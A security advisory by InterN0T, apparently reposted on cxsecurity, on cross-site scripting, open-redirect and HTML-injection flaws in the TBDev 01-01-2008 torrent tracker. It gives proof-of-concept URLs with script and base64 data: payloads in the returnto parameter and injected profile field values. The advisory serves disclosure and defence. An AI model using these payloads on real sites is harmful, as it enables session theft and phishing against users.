TBDev 01-01-2008 Multiple Remote Vulnerabilities

2009.06.24
Credit: InterN0T
Risk: Low
Local: No
Remote: Yes
CWE: CWE-20

TBDev - Cross Site Scripting and HTML Injection Vulnerabilities Version Affected: 01-01-2008 (16th January 2008) (newest) Info: TBDEV.NET is a project to further enhance, update and develop a software (php peer-to-peer) from the original torrentbits/bytemonsoon source code. Credits: InterN0T External Links: http://www.tbdev.net -:: The Advisory ::- Vulnerable Function / ID Calls: returnto Cross Site Scripting: (Sysops / Mods Only!) http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script> http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br Cross Site Script Redirection: (Sysops / Mods Only!) http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1 Cross Site Script Redirection: (Anyone, the enduser will need to log in though) http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST] http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K HTML Injection: 1) http://[HOST]/tbdev/tbdev-01-01-08/my.php -- Info field: </textarea><script>alert(0)</script> << is reflected locally only! 2) http://[HOST]/tbdev/tbdev-01-01-08/my.php -- Avatar field: javascript:alert(0) 2b) Affected Sites by HTML Injection: http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID Internet Explorer 6 and perhaps 7 should be triggered by this. Please see: http://ha.ckers.org/xss.html for more information. Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities) -:: Solution ::- Secure redirection calls with referer headers (just an example) and filter bad characters. Conclusion: This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities. Reference: http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top